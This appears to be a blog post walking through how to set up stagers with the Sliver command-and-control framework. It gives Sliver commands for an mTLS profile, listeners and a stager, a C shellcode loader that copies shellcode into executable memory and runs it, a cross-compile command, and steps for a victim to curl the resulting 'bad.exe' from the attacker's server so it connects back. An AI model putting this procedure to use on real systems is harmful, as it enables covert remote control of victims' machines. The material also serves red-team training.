Post

Using Stagers with Sliver

Using Stagers with Sliver

A stager is a small piece of software that has only one primary task: to trigger a larger implant’s download and make the initial connection between host and C2. Stagers are small, lightweight and can help in AV evasion where they can potentially run in-memory.

In this guide, we will be using sliver as our C2 framework for demonstration. Note that the primary goal of this article is not to AV bypass, but merely as a means of demonstration as to how stagers work.

Payload Generation with Sliver

We can begin by creating a new mTLS profile:

1
profiles new --mtls C2_IP --skip-symbols --format shellcode --arch amd64 myprofile

This creates a profile named myprofile without any shellcode obfuscation.

We can now start the mTLS listener:

1
mtls

We also need a stage listener, which takes URL and a profile name as parameters:

1
stage-listener --url tcp://C2_IP:8443 --profile myprofile

Now, we can move on to stager generation. This can be done with the generate stager command, which is quite similar in syntax to msfvenom:

1
generate stager --lhost C2_IP --lport 8443 --arch amd64 --format c --save /tmp

If we navigate to /tmp, or wherever it was saved, we will see some shellcode:

We need to compile this shellcode into an executable. Dominic Breuker provides a nice program:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include "windows.h"

int main()
{
    unsigned char shellcode[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
    "\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
    ...
    "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
    "\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff"
    "\xd5";


    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();

    return 0;
}

After replacing the shellcode[] array with our own shellcode, we can compile it:

1
x86_64-w64-mingw32-gcc -o compiled.exe compiler.c

We can transfer it to our machine:

1
2
3
4
5
# attacker
python3 -m http.server 80

# victim
curl http://C2IP/compiled.exe -o bad.exe

(Remember, this is NOT an AV Bypass!)

We can see how small it is when downloading - my file was only 117KB. After running the implant by double-clicking, a connection back to us should be established: Success 🎉

This post is licensed under CC BY 4.0 by the author.